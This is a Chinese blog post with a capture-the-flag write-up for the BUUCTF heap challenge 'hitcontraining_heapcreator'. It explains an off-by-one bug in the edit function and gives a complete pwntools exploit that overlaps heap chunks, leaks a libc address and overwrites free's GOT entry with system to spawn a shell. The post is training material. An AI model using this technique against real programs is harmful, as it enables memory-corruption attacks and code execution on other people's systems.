BUUCTF--hitcontraining_heapcreator1

最新推荐文章于 2024-07-06 16:00:29 发布
最新推荐文章于 2024-07-06 16:00:29 发布
阅读量405 收藏 5
点赞数 9
分类专栏: pwn CTF 文章标签: 开发语言 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30528603/article/details/135392150
版权
CTF 同时被 2 个专栏收录
26 篇文章 0 订阅
订阅专栏
pwn
23 篇文章 1 订阅
订阅专栏

老规矩上来看保护:

64位架构并且除了PIE全开。接着黑盒测试下场景:

菜单题不用想就是堆。接着我们我们看看IDA中的逻辑:

程序的主要逻辑是增删改查。我们看看创建堆的过程:

注释我已给出,步骤大概如下:

1.创建一个索引堆,大小为0x10,前八个字节放Size,后八个字节放用户开辟的堆地址。

2.创建用户要求大小的堆,用户存放用户数据。

下面测试一下创建一个大小为0x10的堆,输入数据aaaaa:

下面我们看下释放堆快的代码:

我们看到释放堆快这里没有什么问题,也不存在UAF漏洞。接下来我们看看改堆快内容的代码逻辑:

在edit中我们找到了漏洞所在。show的代码我们就不看了一般是用来泄露地址的。因此我们就需要利用Off-by-one,来伪造一个chunk。以此来达到我们的目的。

根据上述代码逻辑,我们的漏洞利用思路如下:

1.申请三个大小一样的chunk,分别为chunk0,chunk1,chunk2。

2.接着修改chunk0的内容填入bin/sh作为后续system的参数,利用off-by-one并修改下一个索引chunk的大小为0x81(覆盖的是chunk1的索引堆)。

3.将chunk1释放掉,并申请回来此时我们将拥有0x80大小的空间任我们写入。并能够在chunk1的索引堆上修改用户堆地址为我们可利用的got表项。

4.通过show泄露got表地址,并计算libc的基地址,并得出system的地址

5.利用read_input函数将system的地址写入free的got表中

6.触发利用

exp如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-


from pwn import *


#r = remote('node5.buuoj.cn',28780)
r = process("./heapcreator")
elf = ELF("./heapcreator")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so") #这是我本地的,要用你自己本地的或者题目提供的
context.log_level='debug'


def add(size,content):
    r.sendlineafter("choice :",'1')
    r.sendlineafter("Heap : ",str(size))
    r.sendlineafter("heap:",content)

def edit(idx,content):
    r.sendlineafter("choice :",'2')
    r.sendlineafter("Index :",str(idx))
    r.sendlineafter("heap : ",content)

def show(idx):
    r.sendlineafter("choice :",'3')
    r.sendlineafter("Index :",str(idx))

def delete(idx):
    r.sendlineafter("choice :",'4')
    r.sendlineafter("Index :",str(idx))

free_got = elf.got['free']

add(0x18,"aaaaa")   #这里不能用0x10 程序会奔溃 0x18效果是一样的
add(0x10,"aaaaa")
add(0x10,"aaaaa")
#gdb.attach(r)

#pause()

edit(0,b'/bin/sh\x00'+p64(0)*2+b'\x81')


delete(1)
 
add(0x70,p64(0)*8+p64(0x8)+p64(free_got))

free_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

base_addr = free_addr - libc.symbols['free']
system_addr = base_addr + libc.symbols['system']

edit(2,p64(system_addr))

delete(0)

r.interactive()

下面我们看看具体的布局:

申请三个大小一样的堆:

接下来通过漏洞从chunk1的用户输入bin/sh并将chunk2的索引堆大小给改成0x80:

释放掉chunk1接着再申请回来,我们将拥有对0x80的操作权限,并将free_got表地址写入chunk3的索引堆中:

此时往chunk3这个用户堆写数据,将会写入free_got表里,这样我们可以将伪造的system的地址写入free_got表,一旦调用free,将会去执行system。可能有些师傅会在这里有困惑,答案在这里:

这句其实可以这样解读read(0,对应索引堆里的那个堆地址,Size),现在他将变成这样read(0,&free_got,Size)。不知道这样解释明白不,大神忽略。

最后,我们释放chunk1,他将直接执行system函数,并将堆地址给当成参数传入:

理解思路就好,我分别三次下断点运行调试的,因此堆的地址在变化,不必纠结。到这里就结束了。

call就不要ret
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C语言栈溢出 重定向返回地址 执行shellcode学习
顺炸天
12-31 567
REF: https://www.youtube.com/watch?v=1S0aBV-Waeo- 栈结构 https://dl.packetstormsecurity.net/papers/attack/64bit-overflow.pdf- 64位linux 动手实现buffer overflow http://www.cppblog.com/baby-fly/archive/2010/07/27/121395.html- gdb debug 实验环境 Linux kali(201...
hitcontraining_heapcreator
m0sway的博客
01-07 2861
hitcontraining_heapcreator 使用checksec查看: 开启了Canary和栈不可执行,没有开启PIE。 先运行一下看看: 看到菜单,堆题,放进IDA中查看: 分布来查看,首先是create_heap(): heaparray[i] = malloc(0x10uLL):创建用户所需chunk前程序会先创建一个0x10大小的chunk v0[1] = malloc(size);:程序所创建的chunk中存放了用户所创的chunk的地址 edit_heap(): rea
buuctf hitcontraining_heapcreator HITCON Trainging lab13
weixin_45677731的博客
08-10 999
这一题在wiki上面是有的,在Chunk Extend and Overlapping里面,个人觉得这一题对于我这种刚开始学习堆的人来说,是比较容易理解的一题 拖进IDA create_heap函数: 值得注意的是,他这里是会有两次malloc的,也就是说,你申请了一次,他就会创建两个chunk,第一个chunk是0x20大小的,可以看作是记录的作用,里面存放着第二个chunk的size和指针,同时,第一个chunk的地址指针保存在bss段中,heaparray数组这里: 这样表述起来可能不太清晰,我申
[off by one] hitcontraining_heapcreator
huzai9527的博客
04-01 336
[off by one] hitcontraining_heapcreator 本题主要看懂,edit中的off by one, 知道off by one 还需要知道程序的大概结构体 从内存情况推测结构体 每次申请空间,会创建2个chunk,其中一个固定为下面结构体形式,另一个根据大小分配 struct test{ int size; char *content; } exp from pwn import * #p = remote('node3.buuoj.cn',27554) p
BUUCTF刷题3
m0_51251108的博客
05-26 2742
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
Always-Y#Binary_study#IDA-Linux远程调试1
07-25
起因今天刷BUUCTF第三题 Reverse2,由于该程序石ELF格式,只能运行在Linux,动态调试需要GDB,对此我并不熟悉因此,跟大佬学习了,将软件放在L
PWN-PRACTICE-BUUCTF-17
P1umH0的博客
09-05 170
PWN-PRACTICE-BUUCTF-17hitcontraining_heapcreatorwustctf2020_closedciscn_2019_es_7hitcon2014_stkof hitcontraining_heapcreator 单字节溢出,修改下一个chunk的size,造成chunk overlap,实现任意地址读写 参考:buuctf hitcontraining_heapcreator HITCON Trainging lab13 # -*- coding:UTF-8 -*-
HITCON-Training lab13 heapcreatorheap extend)
像初雪一样自由洒落
04-16 997
啊啊啊,搞了一早上,终于终于搞明白了,,, 题目链接:https://buuoj.cn/challenges#hitcontraining_heapcreator ida简单看一下 创建堆 编辑 对比建堆,可以看到size大了一个 打印 删除 程序基本功能就这样了 因为edit的时候可以多写入一个字节,存在off-by-one,我们可...
BUUCTF-PWN刷题记录-3
weixin_44145820的博客
03-31 844
目录hitcontraining_heapcreator hitcontraining_heapcreator 考虑修改GOT表 在edit函数中可以溢出一个byte 这题需要利用堆重叠的方法,因为free之后会置空,只能利用堆重叠进行重复分配 利用思路如下: 先申请三个heap,其中heap[0]的内容大小为8的奇数倍 使用edit溢出修改heap[1]的chunk的size,把heap[...
buuoj Pwn writeup 71-75
yongbaoii的博客
02-23 293
71 hitcontraining_heapcreator 保护 菜单 create edit show delete 72 [V&N2020 公开赛]babybabypwn 保护 这一堆东西,加了沙箱。 程序也是稀奇古怪。 先给了puts的地址。 syscall参数是15的话时调用的sigreturn。 平常我们是先调用signal,再调用sigreturn。 但是这个里面我们是直接调用的sigreturn,所以会把buf里面的东西返回成寄存器的状态。 因为禁用了execve,所以我们
hitcontraining_heapcreator 3/100
m0_57754423的博客
02-23 105
漏洞点: edit_chunk :off by one 一个字节的溢出 free_chunk: 逻辑漏洞,可以泄露libc 思路: 利用逻辑漏洞泄露libc 利用off by one 实现chunk extend 构造堆块重叠 实现任意地址写 exp: from pwn import * p = process("./heapcreator") e = ELF("./heapcreator") libc = e.libc p.timeout = 0.1 def add(size,content): p.r
新型开发语言的试用感受-仓颉语言发布之际
opendba的专栏
07-03 1700
Zig、Odin、Mojo、codon、carbon、nim等语言的使用感受
linux/shell】linux如何去除字符串中空格
qq_35902025的博客
07-06 412
linux如何去除字符串中空格 tr命令可以用来替换或删除字符 sed是一个流编辑器,可以用来处理文本
RedHat运维-LinuxSELinux基础4-端口绑定SELinux上下文
最新发布
a15735748145a的博客
07-06 636
12. 将60001/tcp端口上的SELinux上下文由http_port_t调整为gopher_port_t的方法是______________________;13. 将60002/tcp端口上的SELinux上下文由gopher_port_t调整为ssh_port_t的方法是______________________;14. 将60003/tcp端口上的SELinux上下文由ssh_port_t调整为http_port_t的方法是_______________________;
BUUCTF-[SUCTF 2019]EasySQL1
09-12
BUUCTF-[SUCTF 2019]EasySQL1 是一个关于SQL注入的题目。根据引用和引用的内容,我们可以得知,原始的查询语句是 $sql = "select ".$_POST[query]."|| flag from Flag" ,在这个语句中,用户的输入被直接拼接到了查询语句中,造成了SQL注入的漏洞。而根据引用的内容,我们可以看到当查询的字段是数字时,即使查询的字段不存在也不会报错,但当查询的字段带有英文字母时,就会产生报错。因此,在这个题目中,我们可以尝试构造一个查询语句,选择一个不存在的字段(比如1,2,2,3,5),然后通过注入的方式来获取flag。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值